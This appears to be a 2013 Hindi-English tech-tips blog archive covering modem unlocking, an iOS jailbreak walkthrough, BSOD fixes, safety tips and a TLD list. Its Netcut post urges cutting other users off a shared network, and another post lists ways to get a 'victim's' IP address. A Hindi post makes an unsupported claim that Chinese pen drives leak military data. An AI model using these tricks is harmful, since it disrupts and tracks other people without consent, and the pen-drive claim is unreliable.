Wednesday, February 27, 2013

सम्पूर्ण आज़ादी का शंखनाद

मित्रो ये हमारे लिए बड़े शर्म की बात है कि हम एक छोटी सी पेन ड्राइव भी दूसरे देश से मंगनी पड़ती है और इसी चीज़ का फायदा चीन ने उठाया है जिससे हमारे देश की सुरक्षा तक खतरे में पड़ गयी है आपको यकीं नहीं होगा अगर इस समय युद्ध हो गया तो चीन हमे कुछ दिन में ही पंगु कर देगा..क्योंकि जो भी हम रणनीति बनायेगे वो तुरन्त ही चीन में पहुँच जाएगी.. इसका कारण है ये छोटी सी पेन ड्राइव..पेन ड्राइव एक ऐसा छोटा सा उपकरण है जिसमें कोई भी जानकारी रख सकते है तथा इसे किसी भी समय कहीं पर भी लाया ले जाया जा सकता है। प्रतिबंध के बावजूद सुरक्षा बलों में पेन ड्राइव एक प्रमुख खतरे के रूप में सामने आए हैं, क्योंकि तीनों सैन्य सेवाओं में हुई सुरक्षा चूकों के 70 प्रतिशत मामलों में यही उपकरण जिम्मेदार है।

आज कल चीन जो पेन ड्राइव भारत में भेज रहा है उसमे एक चीप लगी आ रही है जो नेट कांनेट/कनेक्ट कंप्यूटर में लगते ही कंप्यूटर का सारा डाटा भेजने लगती है हमारे सैन्य अधिकारियो के कंप्यूटर में उपस्तिथ देश की सुरक्षा का पूरा डाटा एक बार कनेक्ट होते ही ये पेन ड्राइव सारा का सारा डाटा दुश्मन के हाथ में भेज सकती है..

सेना के एक अधिकारी ने बताया कि हाल के दिनों में पेन ड्राइव का इस्तेमाल बढ़ गया है, क्योंकि यह सूचना भंडारण और उन्हें आसानी से कहीं भी ले जाने वाला उपकरण है। आंतरिक रपटों में इस बात की पुष्टि हुई है कि सशस्त्र सेनाओं में 70 प्रतिशत साइबर सुरक्षा चूकें इसके अनधिकृत उपयोग के कारण हुईं। उन्होंने कहा कि पेन ड्राइव, जिनमें से अधिकतर चीन में बनी होती है, अगर सरकार ने जल्द ही इस दिशा में कोई कदम नहीं उठाया तो देश राम भरोसे है...


Monday, February 25, 2013

How Internet Works.. Simple...!!


Use Any SIM In Any Modem Without Unlocking It


Every One its not possible to use any SIM in a modem without unlocking.
For that you have to Pay.
But don't worry with the following trick you can do it for free :-)


Step by step instruction:

1. Insert SIM in Modem

2. Modem show invalid SIM, just ignore it and close modem software.

3. Start NOKIA PC suite.

4. Go to Nokia pc suite connect to internet option.

5. Go to Configure. Select your data card modem,and make all operator apn setting as like when we use Nokia mobile connection.

Eg:- Apn for Airtel – airtelgprs.com

6. Finish set up.

7. Now connect to internet through PC suite.

8. Wow your net is connected without unlocking the modem.
 

Photo: Use Any SIM In Any Modem Without Unlocking It
================================

Every One its not possible to use any sim in a modem without unlocking. 
For that you have to Pay.
But dont worry with the following trick you can do it for free :-)


Step by step instruction:

1. Insert SIM in Modem

2. Modem show invalid SIM, just ignore it and close modem software.

3. Start NOKIA PC suite.

4. Go to Nokia pc suite connect to internet option.

5. Go to Configure. Select your data card modem,and make all operator apn setting as like when we use Nokia mobile connection.

Eg:- Apn for Airtel – airtelgprs.com

6. Finish set up.

7. Now connect to internet through PC suite.

8. Wow your net is connected without unlocking the modem.

Friday, February 22, 2013

Bandwidth Stealer For Fast Browsing

If you are in your school's computer lab or in home , this software will always help you in your work . It is common thing to have many computer's connected with one device for internet and it causes your bandwidth to fall down . Here I am introducing a software called netcut which cuts the one's connection in such a crucial condition as I stated, I am stating it as crucial as really it’s a headache causing problem for me I hate slow surfing.When it cuts the one's connection , it automatically increases bandwidth of your connection which will let you work more easily and fastly.

Download Netcut here for Free (Last Updated 21/12/2011):-
---------------------------------------------------------------
You can download this bandwidth stealing software named as Netcut from below:-

http://www.ziddu.com/download/17895351/netcut.rar.html

http://www.mediafire.com/?vw0y869rh8pymz8

Using Netcut :-
-----------------

1: Download net cut.

2: Extract the software and install it.

3: Now open netcut software and a window will pop-out showing you connected routers.

4:  Just toggle to the computer which you want to cut off like this photo: Netcut Use

5: And that's it.Now you are free to eat up every last bit of bandwidth. Enjoy

Thursday, February 21, 2013

इंटरनेट पर बचाव के पांच नुस्खे!

1- ईमेल

ईमेल दुनियाभर से संपर्क स्थापित करने का एक बेहतरीन ज़रिया है लेकिन आपका क्लिक करें ईमेल एकाउंट कई तरह से घातक भी साबित हो सकता है. ईमेल के ज़रिए आपके कंप्यूटर और निजी तौर पर आपको कई तरह के नुकसान पहुंचाए जा सकते हैं.
  • इंटरनेट पर अपने ईमेल को सुरक्षित बनाने के लिए अज्ञात स्रोत से आए ‘स्पैम’ यानी गैर ज़रूरी ईमेल को न खोलें.
  • जिन ईमेल पतों पर अंग्रेज़ी के गलत या बहुभाषी अक्षर लिखें हों, जिनके विषय भी ऐसे हों उन्हें बिना पहचाने क्लिक करना भी खतरनाक हो सकता है.
  • इस तरह के ईमेल से आए डॉक्यूमेंट पढ़ने की कोशिश न करें.
  • गैर ज़रूरी ईमेल के भीतर ‘रिमूव’ का विकल्प दिखने पर भी उसके ज़रिए ईमेल को नष्ट न करें.

2- पासवर्ड

  • इंटरनेट पर हर व्यक्ति की पहचान उसके पासवर्ड के ज़रिए होती है. इसके लीक होते ही आपकी निजी जानकारियां सार्वजनिक हो सकती हैं. पासवर्ड के ज़रिए अपराधी इन जानकारियों का गलत इस्तेमाल भी कर सकते हैं.
  • जहां तक संभव हो इंटरनेट पर अपनी हर जानकारी को पासवर्ड से सुरक्षित करें.
  • पासवर्ड बड़े और छोड़े अक्षरों सहित अंकों का मिलाजुला रुप होना चाहिए. पासवर्ड जितना कठिन होगा उसे भेदना उतना ही मुश्किल.
  • अपने पासवर्ड को इंटरनेट पर सोच समझकर ज़ाहिर करें. अनजान वेबसाइट पर पासवर्ड लिखना खतरनाक हो सकता है.
  • समय–समय पर अपने पासवर्ड बदलते रहें. एक ही पासवर्ड कई जगह इस्तेमाल न करें

3- इंटरनेट पर जालसाज़ी

साइबर अपराधी इंटरनेट पर लोगों को अपना शिकार बनाने की फ़िराक में रहते हैं. उनसे बचने के लिए कई तरह के क़दम उठाने ज़रूरी हैं.
  • पैसों से लेन-देन से जुड़े कई तरह के ईमेल आमतौर पर अकाउंट में आते हैं. विदेशियों का ज़िक्र लिए इन ईमेल के जवाब में कोई जानकारी न भेजें.
  • लोन देने, चैरिटी के लिए पैसा मांगने, बकाया पैसा लौटाने और लॉटरी से जुड़े ईमेल आमतौर पर लोगों को फंसाने का ज़रिया होती हैं. इनका जवाब भेजने और जानकारियां मांगने के बजाय इनके बारे में साइबर अपराध शाखा को सूचित करें.

4- वायरस से बचाव

वायरस तकनीकी भाषा में लिखा गया वो प्रोग्राम है जो व्यापक स्तर पर कंप्यूटर को नुकसान पहुंचाने की दृष्टि से बनाया जाता है. इसके ज़रिए कोई इंटरनेट पर आपकी पहचान चुरा सकता है.
  • वायरस से बचने के लिए अनजान स्रोत से आई जानकारियों को क्लिक न करें.
  • अपने कंप्यूटर पर वायरस से बचाव करने वाले सॉफ्टवेयर यानी एंटीवायरस डाउनलोड कर रखें.
  • कंप्यूटर से जुड़े किसी भी बाहरी उपकरण को इस्तेमाल से पहले वायरस के लिए जांच लें. हर कंप्यूटर में ये सुविधा उपलब्ध होती है.
  • इंटरनेट पर मौजूद मुफ्त फिल्में, गाने और सॉफ्टवेयर आमतौर पर वायरस से संक्रमित होते हैं. ऐसा करते समय विशेष रुप से ध्यान रखें.

5- सार्वजनिक जगहों पर कंप्यूटर का इस्तेमाल

सार्वजनिक रुप से उपलब्ध इंटरनेट यानी वाई-फाई वायरस जैसे खतरों का सबसे बड़ा स्रोत हो सकता है. इसके ज़रिए कोई आपकी निजी जानकारियां पढ़ सकता है.
  • सार्वजनिक जगहों पर कंप्यूटर का इस्तेमाल करते हुए किसी भी तरह के अनजान संदेश को स्वीकार न करें.
  • अनजान, अजीबोगरीब लिंक पर क्लिक करने से बिना आपकी इजाज़त भी कंप्यूटर की जानकारियां स्रोत तक पहुंच सकती हैं.
  • जहां तक संभव हो अपने बैंक खातों से जुड़ी जानकारियां अनजान वेबसाइट पर न डालें.

Tuesday, February 19, 2013

Using Read Notify service

This is an email based service. Steps to use Read Notify service:
a. First open the Read Notify website : RCPT
b. Now register on this website and then it will send you confirmation mail. Verify your account.
c. Once your account is activated.
Do the following steps use this service:

Compose your email just like you usually would in your own email or web email program
Type: readnotify.com on the end of your recipients email address (don't worry, that gets removed before your recipients receive the email). Like this: shiviskingg@gmail.com.readnotify.com
Send your email


What is an IP address?


 
 
 
 
 Basically IP address (Internet Protocol address) is a unique numerical value that is assigned to any computer or printer on a computer network that uses an internet protocol for communication purpose. Protocol is basically rules (for Network its rules for communication).
IP address serves for two basic purposes:
1. Host or network interface identification
2. Location Addressing

For exploring more about IP addressing read on wikipedia.

http://en.wikipedia.org/wiki/IP_address
 
 

4 ways to get the IP address of the Victim or another Computer:

1. Using PHP notification Script
2. Using Blogs and Websites
3. Using Read Notify service
4. Sniffing during Gmail and Yahoo chat sessions



How to Jailbreak A5 iDevices using Command line in Windows


A5 jailbreak Absinthe now officially released for windows but still some geek users likes to Jailbreak their devices using Command Line Interface (CLI) method.

Step 1:
---------
Make sure your iDevice is backed up using iTunes & Passcode is deactivated

Step 2:
---------
Download Absinthe CLI files (Cinject) from here

http://www.mediafire.com/?5mywppfndm5dpja

Step 3:
---------
Connect your iDevice to your PC

Step 4:
---------
Extract the downloaded zip file to any folder.
(I extracted it to my user folder C:\users\yourusername & renamed that folder to cinject for easy typing)

Step 5:
---------
Launch Command line (CMD) on your windows machine.
Press Win key + R & type “CMD” & press enter

Step 6:
---------
Now CD Command line to “cinject” folder
Type
CD C:\users\yourusername\cinject
And press enter

Step 7:
---------
Now type cinject & press enter to make sure that “cinject” is in the selected folder and working

Step 8:
---------
Your command line will look like this

C:\Users\Amish-PC\cinject>cinject
Usage: cinject [ options ]
Corona injector CLI v0.4.3
Copyright (C) 2011-2012 by iPhone Dev. Team
With exploit work by: @pod2g, @planetbeing, @saurik, @pimskeks, @p0sixninja, @Mu
scleNerd, and @xvolks

Options:

Configuration profiles:
-l List current profiles
-i Install profile
-r [] Remove all profiles, or profiles matching pattern

AFC transfers:
-a Alternative afc service to use (2 is available after jailbreak)
-u … Upload file(s) via afc (add final “dir=dirname” to specify which afc directory)
-d [] Show list of files in afc directory
-X Delete afc directory or file

ROP assistance:
-s Compute slide
-e Erase existing crash logs
-g Get diagnostics

Backups and restores:

-B Create backup
-R Restore from backup
-L List contents of an MBDB file
-M Modify the ipsec.plist on device
-p Modify the preferences.plist (requires -f too)
-f File to use with -p
-H Hide media files
-U Unhide media files

Chained operations:
-j Jailbreak device using given payloads directory (ADVANCED use only!)

Other:
-w Watch syslog
-v Debug verbosity level
-h This help message

C:\Users\Shyam\cinject>

Step 9:
---------
Now type the following command without quotes & press enter
“cinject -i payloads/jailbreak.mobileconfig”
This will install an profile in your iDevice.

Step 10:
----------
Now you will see dialog like this in your iDevice.
Now select “Install”


Now select “Install Now” and Install the Profile.

Step 11:
-----------
Now select next without entering any password.

now VPN profile for jailbreak will be installed & you can close settings & return to command line

Step 12:
----------
Now enter the following command without quotes in CMD
“cinject -j payloads”
Your CMD will look like this

C:\Users\Shyam\cinject>cinject -j payloads

Finding slide…

Generating ROP…

ROP was generated

Uploaded corona/payload

Uploaded corona/payload-vars

Uploaded corona/racoon-exploit.conf

Uploaded corona/vnimage.clean

Uploaded corona/vnimage.overflow

Uploaded corona/vnimage.payload

Uploaded corona/corona.tgz

Uploaded corona/cleanup

Uploaded corona/com.apple.ipsec.plist

Uploaded corona/Cydia.tgz

Uploaded corona/filemover

Uploaded corona/filemover.plist

Uploaded corona/gzip

Uploaded corona/jailbreak

Uploaded corona/jailbreak.mobileconfig

Uploaded corona/jb.plist

Uploaded corona/racoon-exploit-bootstrap.conf

Uploaded corona/tar

Creating backup…

72 files backed up

Adding custom com.apple.ipsec.plist to backup

Restoring…

1 files restored

Now use “cinject -w” to start watching the syslog.

Then toggle VPN on and look for the “pod2g is in da house!” syslog message.

This actually takes an backup of your .plist files and modify some values and restore it plus inject some files for jailbreak.

Some users will stuck in backup those users “Erase All Content and Settings” setup like new iPad & after jailbreak restore backup with iTunes

Step 13:
-----------
Now enter following code in command line without quotes
“cinject -w”
Now your command line will look like matrix wallpaper, ignore everything.

Step 14:
----------
At the end when it stops, Go to VPN Settings in your iDevice and toggle VPN ON and look for syslog message “pod2g is in da house!“. After that your iDevice will restart and you will see cydia on screen. Launch Cydia and enjoy your Jailbroken iPhone 4S &and iPad 2.


For Advanced Users:
-------------------------
cinject -i payloads/jailbreak.mobileconfig
cinject -j payloads
cinject -w
toggle VPN on
 
 

Photo: How to Jailbreak A5 iDevices using Command line in Windows 
========================================

A5 jailbreak Absinthe now officially released for windows but still some geek users likes to Jailbreak their devices using Command Line Interface (CLI) method.

Step 1:
---------
Make sure your iDevice is backed up using iTunes & Passcode is deactivated

Step 2:
---------
Download Absinthe CLI files (Cinject) from here

http://www.mediafire.com/?5mywppfndm5dpja

Step 3:
---------
Connect your iDevice to your PC

Step 4:
---------
Extract the downloaded zip file to any folder.
(I extracted it to my user folder C:\users\yourusername & renamed that folder to cinject for easy typing)

Step 5:
---------
Launch Command line (CMD) on your windows machine.
Press Win key + R & type “CMD” & press enter

Step 6:
---------
Now CD Command line to “cinject” folder
Type
CD C:\users\yourusername\cinject
And press enter

Step 7:
---------
Now type cinject & press enter to make sure that “cinject” is in the selected folder and working

Step 8:
---------
Your command line will look like this

     C:\Users\Amish-PC\cinject>cinject
    Usage: cinject [ options ]
    Corona injector CLI v0.4.3
    Copyright (C) 2011-2012 by iPhone Dev. Team
    With exploit work by: @pod2g, @planetbeing, @saurik, @pimskeks, @p0sixninja, @Mu
    scleNerd, and @xvolks

    Options:

    Configuration profiles:
    -l           List current profiles
    -i           Install profile
    -r          [] Remove all profiles, or profiles matching pattern

    AFC transfers:
    -a         Alternative afc service to use (2 is available after jailbreak)
    -u …    Upload file(s) via afc (add final “dir=dirname” to specify which afc directory)
    -d []     Show list of files in afc directory
    -X        Delete afc directory or file

    ROP assistance:
    -s          Compute slide
    -e          Erase existing crash logs
    -g          Get diagnostics

    Backups and restores:

    -B         Create backup
    -R         Restore from backup
    -L         List contents of an MBDB file
    -M        Modify the ipsec.plist on device
    -p         Modify the preferences.plist (requires -f too)
    -f          File to use with -p
    -H        Hide media files
    -U        Unhide media files

    Chained operations:
    -j         Jailbreak device using given payloads directory (ADVANCED use only!)

    Other:
    -w        Watch syslog
    -v         Debug verbosity level
    -h         This help message

    C:\Users\Shyam\cinject>

Step 9:
---------
Now type the following command without quotes & press enter
“cinject -i payloads/jailbreak.mobileconfig”
This will install an profile in your iDevice.

Step 10:
----------
Now  you will see dialog like this in your iDevice.
Now select “Install”


Now select “Install Now” and Install the Profile.

Step 11:
-----------
Now select next without entering any password.

now VPN profile for jailbreak will be installed & you can close settings & return to command line

Step 12:
----------
Now enter the following command without quotes in CMD
“cinject -j payloads”
Your CMD will look like this

     C:\Users\Shyam\cinject>cinject -j payloads

    Finding slide…

    Generating ROP…

    ROP was generated

    Uploaded corona/payload

    Uploaded corona/payload-vars

    Uploaded corona/racoon-exploit.conf

    Uploaded corona/vnimage.clean

    Uploaded corona/vnimage.overflow

    Uploaded corona/vnimage.payload

    Uploaded corona/corona.tgz

    Uploaded corona/cleanup

    Uploaded corona/com.apple.ipsec.plist

    Uploaded corona/Cydia.tgz

    Uploaded corona/filemover

    Uploaded corona/filemover.plist

    Uploaded corona/gzip

    Uploaded corona/jailbreak

    Uploaded corona/jailbreak.mobileconfig

    Uploaded corona/jb.plist

    Uploaded corona/racoon-exploit-bootstrap.conf

    Uploaded corona/tar

    Creating backup…

    72 files backed up

    Adding custom com.apple.ipsec.plist to backup

    Restoring…

    1 files restored

    Now use “cinject -w” to start watching the syslog.

    Then toggle VPN on and look for the “pod2g is in da house!” syslog message.

This actually takes an backup of your .plist files and modify some values and restore it plus inject some files for jailbreak.

Some users will stuck in backup those users “Erase All Content and Settings” setup like new iPad & after jailbreak restore backup with iTunes

Step 13:
-----------
Now enter following code in command line without quotes
“cinject -w”
Now your command line will look like matrix wallpaper, ignore everything.

Step 14:
----------
At the end when it stops, Go to VPN Settings in your iDevice and toggle VPN ON and look for syslog message “pod2g is in da house!“. After that your iDevice will restart and  you will see cydia on screen. Launch Cydia and enjoy your Jailbroken iPhone 4S &and iPad 2.


For Advanced Users:
-------------------------
    cinject -i payloads/jailbreak.mobileconfig
    cinject -j payloads
    cinject -w
    toggle VPN on

How To Fix BSOD Error Codes

A Blue screen of Death (BSOD) is known as the STOP error. When Windows suffers from a serious error of non-recoverable nature, it stops immediately so as to prevent damage to the data or hardware. STOP error includes a STOP code which can be used to diagnose and possibly fix the problem.

List of few BSOD errors are given below
~~~~~~~~~~~~~~~~~~~~~~~~~~

Stop 0x000000CE or DRIVER_UNLOADED_WITHOUT_CANCELLING_PENDING_OPERATIONS
---------------------------------------------------------------------------
It indicates that before exiting, a driver failed to cancel pending operations.

Fix
----
It might occur because of installing a faulty device driver/system device. Disabling or removing drivers (name is mentioned in the STOP message) resolves the issue. Using updated software also resolves the issue.

Stop 0×00000050 or PAGE_FAULT_IN_NONPAGED_AREA
------------------------------------------------------------------
This indicates that requested data was not in the memory. It happens when a reference to an invalid system memory address is done. Defective memory or incompatible software might cause this error.

Fix
-----
If hardware is added recently, remove and replace it to determine if it was contributing to the problem or not.
If a faulty driver/system service is installed. Always use updated drivers and software to avoid this error.

Stop 0x0000009F or DRIVER_POWER_STATE_FAILURE
---------------------------------------------------------------
This indicates that a driver is in an inconsistent power state.

Fix
-----
It can occur after installing faulty applications/drivers/system services. We need to uninstall the particular application (name is mentioned in the STOP message)/ roll back the particular driver/ use updated version of the software.

Stop 0xBE or ATTEMPTED_WRITE_TO_READONLY_MEMORY
-----------------------------------------------------------------------
It indicates that a driver has attempted to write to read-only memory

Fix
----
It occurs because of installation of a faulty device driver/system services/firmware. Try to use updated version of software to resolve this problem. If the driver name is mentioned in the STOP message, we have to remove the driver or have to use a possible update of it.

Stop 0X0000002E or DATA_BUS_ERROR
-----------------------------------------------
It indicates a system memory parity error. It is caused due to defective or failed RAM/incompatibility of memory hardware. Also when a device driver attempts to access an address in the range of 0x8xxxxxxx that does not exist, this error occurs. It can also indicate that virus or some other problem caused hard disk damage.

Fix
----
This error is mainly due to defective/malfunctioning memory hardware like memory modules, video adapter RAM. Remove and replace the hardware to find out its contribution to the error.
Hard Disk corruption is also a cause of this problem
Cracks, scratches or defective component on the motherboard can also cause this problem. Repair the motherboard.
It can also happen due to installation of faulty drivers or system services. If file name is provided in the error code, remove that driver. Also use updated version of software’s.

Stop 0x000000D1 or Driver_IQRL_NOT_LESS_OR_EQUAL
------------------------------------------------------------------
It indicates that the system has attempted for an access to a page able memory by using a kernel process IQRL that was too high. Improper addresses used by driver’s causes this error.

Fix
-----
It might occur because of installing a faulty device driver/system device. Disabling or removing drivers (name is mentioned in the STOP message) resolves the issue. Using updated software also resolves the issue.

Stop 0x000000EA or THREAD_STUCK_IN_DEVICE_DRIVER
-------------------------------------------------------------------
It is caused by a display driver making the system to pause indefinitely. Over here the display driver waits for the video hardware to enter an idle state. All this indicate a hardware problem with the video driver.

Fix
-----
It might occur because of installing a faulty device driver/system device. Disabling or removing drivers (name is mentioned in the STOP message) resolves the issue. Using updated software also resolves the issue.

I hope this post has helped you in understanding all about different types of BSOD errors and its’ fixes. So please give your suggestions and comments so that it can be improved more.
 
 

Photo: How To Fix BSOD Error Codes
====================

A Blue screen of Death (BSOD) is known as the STOP error. When Windows suffers from a serious error of non-recoverable nature, it stops immediately so as to prevent damage to the data or hardware. STOP error includes a STOP code which can be used to diagnose and possibly fix the problem.

List of few BSOD errors are given below
~~~~~~~~~~~~~~~~~~~~~~~~~~

Stop 0x000000CE or DRIVER_UNLOADED_WITHOUT_CANCELLING_PENDING_OPERATIONS
---------------------------------------------------------------------------
It indicates that before exiting, a driver failed to cancel pending operations.

Fix
----
    It might occur because of installing a faulty device driver/system device. Disabling or removing drivers (name is mentioned in the STOP message) resolves the issue. Using updated software also resolves the issue.

Stop 0×00000050 or PAGE_FAULT_IN_NONPAGED_AREA
------------------------------------------------------------------
This indicates that requested data was not in the memory. It happens when a reference to an invalid system memory address is done. Defective memory or incompatible software might cause this error.

Fix
-----
    If hardware is added recently, remove and replace it to determine if it was contributing to the problem or not.
    If a faulty driver/system service is installed. Always use updated drivers and software to avoid this error.

Stop 0x0000009F or DRIVER_POWER_STATE_FAILURE
---------------------------------------------------------------
This indicates that a driver is in an inconsistent power state.

Fix
-----
    It can occur after installing faulty applications/drivers/system services. We need to uninstall the particular application (name is mentioned in the STOP message)/ roll back the particular driver/ use updated version of the software.

Stop 0xBE or ATTEMPTED_WRITE_TO_READONLY_MEMORY
-----------------------------------------------------------------------
It indicates that a driver has attempted to write to read-only memory

Fix
----
    It occurs because of installation of a faulty device driver/system services/firmware.  Try to use updated version of software to resolve this problem. If the driver name is mentioned in the STOP message, we have to remove the driver or have to use a possible update of it.

Stop 0X0000002E or DATA_BUS_ERROR
-----------------------------------------------
It indicates a system memory parity error. It is caused due to defective or failed RAM/incompatibility of memory hardware. Also when a device driver attempts to access an address in the range of 0x8xxxxxxx that does not exist, this error occurs. It can also indicate that virus or some other problem caused hard disk damage.

Fix
----
    This error is mainly due to defective/malfunctioning memory hardware like memory modules, video adapter RAM. Remove and replace the hardware to find out its contribution to the error.
    Hard Disk corruption is also a cause of this problem
    Cracks, scratches or defective component on the motherboard can also cause this problem. Repair the motherboard.
    It can also happen due to installation of faulty drivers or system services. If file name is provided in the error code, remove that driver. Also use updated version of software’s.

Stop 0x000000D1 or Driver_IQRL_NOT_LESS_OR_EQUAL
------------------------------------------------------------------
It indicates that the system has attempted for an access to a page able memory by using a kernel process IQRL that was too high. Improper addresses used by driver’s causes this error.

Fix
-----
    It might occur because of installing a faulty device driver/system device. Disabling or removing drivers (name is mentioned in the STOP message) resolves the issue. Using updated software also resolves the issue.

Stop 0x000000EA or THREAD_STUCK_IN_DEVICE_DRIVER
-------------------------------------------------------------------
It is caused by a display driver making the system to pause indefinitely. Over here the display driver waits for the video hardware to enter an idle state. All this indicate a hardware problem with the video driver.

 Fix
-----
    It might occur because of installing a faulty device driver/system device. Disabling or removing drivers (name is mentioned in the STOP message) resolves the issue. Using updated software also resolves the issue.

I hope this post has helped you in understanding all about different types of BSOD errors and its’ fixes. So please give your suggestions and comments so that it can be improved more.

Monday, February 11, 2013

Customize your Browser Home Page to Look like Windows 8


Bored looking at the same default home page whenever your browser starts? Then try "EIGHT", a browser start screen inspired from Windows 8's tiled interface. It is basically a web page created using HTML, CSS and jQuery. It shows website shortcuts as tiles which when clicked open the associated URLs. It's also got a search bar right in the page itself.

Not only EIGHT looks awesome, it is customizable too. You can replace the shortcuts with your own favorite sites, you can change the default search engine, you can customize the background color and you can even use a wallpaper as background. EIGHT is compatible with all the major browsers (Firefox, Chrome, Opera, Internet Explorer).
To use it, first download the ZIP file from here "www.deviantart.com/download/212847573/eight___start_page___update_by_flatmo1-d3iq28l.zip" and extract the folder contained in it somewhere on your hard drive. Navigate to the folder (usually named "EIGHT-firefox start page+config") and open the “index.htm” with your preferred web browser. Close all other opened tabs before you continue.

Mozilla Firefox Users :
--------------------------
Click on the orange Firefox button and choose "Options". Under the "General" tab select “Show my home page” from “When Firefox starts“ and click the "Use Current Pages" button. Press [enter].

Google Chrome Users :
----------------------------
Copy the URL from the address bar. Click on the "wrench" button and select "Options". Choose "Open the following pages:" under "On startup" and in the "New tab" field paste the URL you copied earlier. Also, select "Open this page" from "Home page" and paste the same URL in its field. Close the tab and reload.


Other Browser Users : Follow similar steps as mentioned above.

Customizing EIGHT :
-------------------------
To customize EIGHT, again navigate to "EIGHT-firefox start page+config" and run "config.htm". Modify the shortcuts and texts as per your preference and click "Generate settings file". Copy the entire code. Now open "source.js" (also present in "EIGHT-firefox start page+config" folder) with notepad, replace the original texts with the copied text. Save the file.

Note : If you wish to change any pre-defined website shortcut with a new one, first paste the website logo in the "thumbs" folder. Now run "config.htm", click on the shortcut tile you wish to replace and provide title and URL of the website along with the name of the website logo.

You can find thumbnails icons here : Thumbnails for "EIGHT" by ~jeppethe

http://jeppethe.deviantart.com/art/Thumbnails-for-quot-EIGHT-quot-213277665

Check this link if you want to change the background color or want to use your own wallpaper as background.

http://eight.kx.cz/faq.htm
 
 

Photo: Customize your Browser Home Page to Look like Windows 8 
=======================================

Bored looking at the same default home page whenever your browser starts? Then try "EIGHT", a browser start screen inspired from Windows 8's tiled interface. It is basically a web page created using HTML, CSS and jQuery. It shows website shortcuts as tiles which when clicked open the associated URLs. It's also got a search bar right in the page itself.

Not only EIGHT looks awesome, it is customizable too. You can replace the shortcuts with your own favorite sites, you can change the default search engine, you can customize the background color and you can even use a wallpaper as background. EIGHT is compatible with all the major browsers (Firefox, Chrome, Opera, Internet Explorer).

To use it, first download the ZIP file from here "www.deviantart.com/download/212847573/eight___start_page___update_by_flatmo1-d3iq28l.zip" and extract the folder contained in it somewhere on your hard drive. Navigate to the folder (usually named "EIGHT-firefox start page+config") and open the “index.htm” with your preferred web browser. Close all other opened tabs before you continue.

Mozilla Firefox Users :
--------------------------
 Click on the orange Firefox button and choose "Options". Under the "General" tab select “Show my home page” from “When Firefox starts“ and click the "Use Current Pages" button. Press [enter].

Google Chrome Users :
----------------------------
 Copy the URL from the address bar. Click on the "wrench" button and select "Options". Choose "Open the following pages:" under "On startup" and in the "New tab" field paste the URL you copied earlier. Also, select "Open this page" from "Home page" and paste the same URL in its field. Close the tab and reload.


Other Browser Users : Follow similar steps as mentioned above.

Customizing EIGHT :
-------------------------
To customize EIGHT, again navigate to "EIGHT-firefox start page+config" and run "config.htm". Modify the shortcuts and texts as per your preference and click "Generate settings file". Copy the entire code. Now open "source.js" (also present in "EIGHT-firefox start page+config" folder) with notepad, replace the original texts with the copied text. Save the file.

Note : If you wish to change any pre-defined website shortcut with a new one, first paste the website logo in the "thumbs" folder. Now run "config.htm", click on the shortcut tile you wish to replace and provide title and URL of the website along with the name of the website logo.

You can find thumbnails icons here : Thumbnails for "EIGHT" by ~jeppethe

http://jeppethe.deviantart.com/art/Thumbnails-for-quot-EIGHT-quot-213277665

Check this link if you want to change the background color or want to use your own wallpaper as background.

http://eight.kx.cz/faq.htm

How to Gmail in a Pen Drive (Mail Stores)

You can backup your All E-mail in to your PC or Pen drive by using Microsoft Outlook express. You can also use software that is MailStore, It is the best software for Email archiving and backup software .You can download Mailstore software from the official website of Mailstore.

First Download Mail Store

http://www.mailstore.com/en/mailstore-home.aspx



Photo: How to Gmail in a Pen Drive (Mail Stores)
===========================

You can backup your All E-mail in to your PC or Pen drive by using Microsoft Outlook express. You can also use software that is MailStore, It is the best software for Email archiving and backup software .You can download Mailstore software from the official website of Mailstore.

First  Download Mail Store

http://www.mailstore.com/en/mailstore-home.aspx

List of Top Level Domain (TLD)


Name : xxxxxx
Entity : xxxxxxxx
Notes : xxxxxxxxx

.aero
air-transport industry
Must verify eligibility for registration; only those in various categories of air-travel-related entities may register.

.asia
Asia-Pacific region
This is a TLD for companies, organizations, and individuals based in the region of Asia, Australia, and the Pacific.

.biz
business
This is an open TLD; any person or entity is permitted to register; however, registrations may be challenged later if they are not held by commercial entities in accordance with the domain’s charter. This TLD was created to provide relief for the wildly-popular .com TLD.

.cat
Catalan
This is a TLD for Web sites in the Catalan language or related to Catalan culture.

.com
commercial
This is an open TLD; any person or entity is permitted to register. Though originally intended for for-profit business entities, for a number of reasons it became the “main” TLD for domain names and is currently used by all types of entities including nonprofits, schools and private individuals. Domain name registrations may be challenged if the holder cannot prove an outside relation justifying reservation of the name, to prevent “squatting”.

.coop
cooperatives
The .coop TLD is limited to cooperatives as defined by the Rochdale Principles.

.edu
educational
The .edu TLD is limited to specific educational institutions such as, but not limited to, primary schools, middle schools, secondary schools, colleges, and universities. In the US, its usability was limited in 2001 to post-secondary institutions accredited by an agency on the list of nationally recognized accrediting agencies maintained by the United States Department of Education. This domain is therefore almost exclusively used by U.S. colleges and universities. Some institutions that do not meet the current registration criteria havegrandfathered domain names.

.gov
governmental
The .gov TLD is limited to U.S. governmental entities and agencies.

.info
information
This is an open TLD; any person or entity is permitted to register.

.int
international organizations
The .int TLD is strictly limited to organizations, offices, and programs which are endorsed by a treaty between two or more nations.

.jobs
companies
The .jobs TLD is designed to be added after the names of established companies with jobs to advertise. At this time, owners of a “company.jobs” domain are not permitted to post jobs of third party employers.

.mil
U.S. military
The .mil TLD is limited to use by the U.S. military.

.mobi
mobile devices
Must be used for mobile-compatible sites in accordance with standards.

.museum
museums
Must be verified as a legitimate museum.

.name
individuals, by name
This is an open TLD; any person or entity is permitted to register; however, registrations may be challenged later if they are not by individuals (or the owners of fictional characters) in accordance with the domain’s charter.

.net
network
This is an open TLD; any person or entity is permitted to register. Originally intended for use by domains pointing to a distributed network of computers, or “umbrella” sites that act as the portal to a set of smaller websites.

.org
organization
This is an open TLD; any person or entity is permitted to register. Originally intended for use by non-profit organizations, and still primarily used by same.

.pro
professions
Currently, .pro is reserved for licensed or certified lawyers, accountants, physicians and engineers in France, Canada, NL, UK and the U.S. A professional seeking to register a .pro domain must provide their registrar with the appropriate credentials.

.tel
Internet communication services
A contact directory housing all types of contact information directly in the Domain Name System.

.travel

travel and tourism industry related sites
Must be verified as a legitimate travel-related entity.

.xxx adult entertainment
For sites providing sexually-explicit content.
 
 

Photo: List of Top Level Domain (TLD)
=====================

Name : xxxxxx	
Entity : xxxxxxxx
Notes : xxxxxxxxx

.aero	
air-transport industry	
Must verify eligibility for registration; only those in various categories of air-travel-related entities may register.

.asia	
Asia-Pacific region	
